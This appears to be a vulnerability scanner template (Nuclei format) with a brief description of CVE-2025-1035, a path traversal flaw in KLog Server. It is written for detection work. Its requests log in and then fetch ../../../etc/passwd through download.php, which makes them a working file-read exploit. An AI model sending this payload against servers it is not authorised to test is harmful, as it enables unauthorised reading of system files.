Vulnerability Description
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technologies KLog Server allows Manipulating Web Input to File System Calls. This issue affects KLog Server: before 3.1.1.
id: CVE-2025-1035

info:
  name: KLog Server - Path Traversal
  author: s4e-io
  severity: medium
  description: |
    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
  reference:
    - https://www.byresearchers.net/2025/02/cve-2025-1035-klog-server-31.html
    - https://www.usom.gov.tr/bildirim/tr-25-0037
    - https://www.cve.org/CVERecord?id=CVE-2025-1035
  classification:
    epss-score: 0.21834
    epss-percentile: 0.95562
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.7
    cve-id: CVE-2025-1035
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    vendor: klogserver
    product: klog_server
  tags: cve,cve2025,klog-server,lfi

variables:
  filename: "{{to_lower(rand_text_alpha(6))}}"

http:
  - raw:
      - |
        POST /actions/entree.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pswd={{password}}&action=login

      - |
        GET /actions/download.php?action=web&file=../../../etc/passwd&name={{filename}}.zip HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body_2)"
          - 'contains_all(header_2, "application/octet-stream", "filename=")'
          - 'status_code_2 == 200'
        condition: and
# digest: 490a0046304402201845890908db9f734f57a648e48e93f352ea1933d2b42fd8b7fc8891bf457ea502206e1d1e2e73ab410e412e55f147e22247fa63ca51fef9dae6cfa5807d66a5c3ac:922c64590222798bb761d5b6d8e72950